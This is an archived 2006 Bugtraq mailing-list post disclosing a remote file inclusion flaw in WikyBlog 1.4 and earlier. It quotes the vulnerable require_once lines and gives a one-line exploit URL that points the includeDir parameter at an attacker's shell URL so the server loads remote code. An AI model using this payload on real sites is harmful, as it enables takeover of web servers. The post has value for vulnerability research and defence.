lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061004232844.5126.qmail@securityfocus.com>
Date: 4 Oct 2006 23:28:44 -0000
From: xp1o@....com
To: bugtraq@...urityfocus.com
Subject: WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

#==============================================================================================
#WikyBlog <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#Bug in :index.php
#
#Vlu Code :
#--------------------------------
#
#            require_once($includeDir.'/wiki2.php');
#             require_once($includeDir.'/wiki3.php');
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com/[scerpitPath]/index.php?includeDir=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : MoHaNdKo
#
#Conatact : xp1o@....com
#or
# wWw.xP10.CoM & wWw.TaRyaG.CoM
#Greetz : r00tshell ( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA
# and all member on xp10.com and tryag.com
==================================================================================================

vendor:
http://puzzle.dl.sourceforge.net/sourceforge/wikyblog/WikyBlog-1.2.3.zip

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ